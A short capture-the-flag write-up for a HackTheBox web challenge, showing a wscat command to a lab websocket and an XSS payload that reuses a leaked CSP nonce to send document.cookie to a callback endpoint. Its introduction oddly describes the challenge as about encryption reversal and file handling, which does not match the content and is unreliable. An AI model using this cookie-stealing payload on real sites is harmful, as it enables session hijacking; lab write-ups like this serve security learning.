Post

HackTheBox Cursed Stale Policy Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Cursed Stale Policy Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Looking at the code, the most developed aspect seems to be the logging in the websocket, so here’s the approach to interact with it:

1

wscat -c http://94.237.59.180:49425/ws

The nonce is shown in the default policy, and this is the already provided payload with the nonce:

1
2
3
4
5
6
7

<script nonce="5247551b650fb492cdb1cad3fe71d337">
   fetch('/callback', {
       method: 'POST',
       headers: { 'Content-Type': 'application/json' },
       body: JSON.stringify({ cookies: document.cookie })
   });
</script>

Trigger the Bot, and the result will be displayed either in the WebSocket logs or in the Request History.

Note: Previously, the Request History feature was not implemented, which is why using the websocket was necessary to capture the information.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.